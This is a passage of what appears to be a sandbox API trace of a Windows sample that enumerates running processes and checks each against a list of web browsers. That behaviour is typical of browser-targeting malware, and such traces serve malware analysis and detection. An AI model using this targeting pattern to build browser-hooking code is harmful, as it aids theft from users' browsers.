lpString2="opera.exe") returned 1 [0221.118] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.119] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0221.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0221.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0221.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0221.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.120] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.120] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.120] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.120] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.120] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.121] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.121] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.121] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.121] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.121] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.122] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0221.122] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0221.122] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0221.122] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0221.122] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0221.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0221.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0221.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0221.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0221.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0221.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0221.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0221.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.123] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.123] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.123] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.123] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.123] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0221.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0221.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0221.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0221.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.124] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0221.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0221.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0221.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0221.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0221.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.125] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0221.125] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0221.125] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0221.125] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0221.125] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0221.125] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.125] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0221.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0221.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0221.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0221.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0221.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0221.126] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0221.126] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0221.126] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0221.126] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0221.126] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0221.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0221.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0221.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0221.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0221.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.127] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0221.127] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0221.127] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0221.127] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0221.128] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0221.128] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.128] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0221.128] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0221.128] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0221.128] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0221.128] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0221.128] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.128] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0221.129] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0221.129] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0221.129] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0221.129] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0221.129] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.129] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0221.129] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0221.129] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0221.129] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0221.129] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0221.129] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.129] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0221.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0221.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0221.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0221.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0221.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.130] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0221.130] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0221.130] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0221.131] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0221.131] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0221.131] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.131] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0221.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0221.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0221.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0221.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0221.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.131] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0221.132] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0221.132] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0221.132] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0221.132] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0221.132] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.132] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0221.132] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0221.132] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0221.132] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0221.132] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0221.132] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.132] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0221.133] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0221.133] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0221.133] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0221.133] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0221.133] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.133] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0221.133] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0221.133] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0221.133] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0221.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0221.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.134] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0221.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0221.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0221.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0221.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0221.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.134] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0221.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0221.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0221.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0221.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0221.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.135] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0221.135] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0221.135] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0221.135] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0221.135] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0221.135] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.135] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0221.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0221.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0221.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0221.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0221.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.136] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0221.136] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0221.136] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0221.136] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0221.136] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0221.137] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.137] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0221.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0221.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0221.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0221.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.137] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.138] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.138] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.138] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.138] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.138] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.138] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.138] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0221.138] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0221.138] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0221.138] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0221.138] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.138] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.139] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.139] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.139] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.139] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.139] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.139] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0221.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0221.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0221.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0221.186] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, 